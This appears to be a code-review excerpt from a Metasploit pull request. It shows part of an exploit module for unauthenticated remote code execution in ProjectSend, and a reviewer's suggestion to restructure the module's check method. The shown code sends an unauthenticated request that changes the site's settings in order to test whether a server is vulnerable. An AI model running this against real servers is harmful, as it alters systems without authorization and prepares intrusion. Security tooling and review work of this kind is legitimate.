modules/exploits/linux/http/projectsend_unauth_rce.rb

```diff
@@ -0,0 +1,388 @@
+        ],
+        'References' => [
+          ['URL', 'https://github.com/projectsend/projectsend/commit/193367d937b1a59ed5b68dd4e60bd53317473744'],
+          ['URL', 'https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf'],
+        ],
+        'DisclosureDate' => '2024-07-19',
+        'DefaultTarget' => 0,
+        'Targets' => [
+          ['ProjectSend r1335 - r1605', { 'Platform' => 'php', 'Arch' => ARCH_PHP }]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new(
+          'TARGETURI',
+          [true, 'The TARGETURI for ProjectSend', '/']
+        ),
+        OptString.new(
+          'REVERT_TO_DEFAULTS',
+          [true, 'Revert application to secure default settings after exploitation. This will disable client registration, auto-approval of new clients, client file uploads, and enable upload restrictions for all users.', true]
+        )
+      ]
+    )
+  end
+
+  def check
+    csrf_token, phpsessid = get_csrf_and_session_id
+
+    # Obtain the current title of the website
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
+    })
+
+    title_regex = %r{<title>.*?&raquo;\s+(.*?)</title>}
+    original_title = res.body[title_regex, 1]
+
+    # Generate a new title for the website
+    random_new_title = Rex::Text.rand_text_alphanumeric(8)
+
+    # Test if version is vulnerable, by attempting to change the title of the install
+    params = {
+      'csrf_token' => csrf_token,
+      'section' => 'general',
+      'this_install_title' => random_new_title
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),
+      'cookie' => phpsessid,
+      'vars_post' => params
+    })
+
+    unless res
+      fail_with(Failure::NoAccess, 'Failed to connect to the provided URL')
+    end
+
+    # GET request to check if the title updated
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
+    })
+
+    # Extract new title for comparison
+    updated_title = res.body[title_regex, 1]
+
+    # If the title was changed, it is vulnerable and we should restore the original title
+    if updated_title.eql? random_new_title
+      params = {
+        'csrf_token' => csrf_token,
+        'section' => 'general',
+        'this_install_title' => original_title
+      }
+      send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),
+        'cookie' => phpsessid,
+        'vars_post' => params
+      })
+
+      CheckCode::Vulnerable
+    else
+      CheckCode::Safe
+    end
```

Comment:
```suggestion
    if updated_title != random_new_title
      return CheckCode::Safe
    end
    
    # If the title was changed, it is vulnerable and we should restore the original title
    params = {
      'csrf_token' => csrf_token,
      'section' => 'general',
      'this_install_title' => original_title
    }
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),
      'cookie' => phpsessid,
      'vars_post' => params
    })

    return CheckCode::Vulnerable
```

Inverting the condition reduce the level of nested indentation.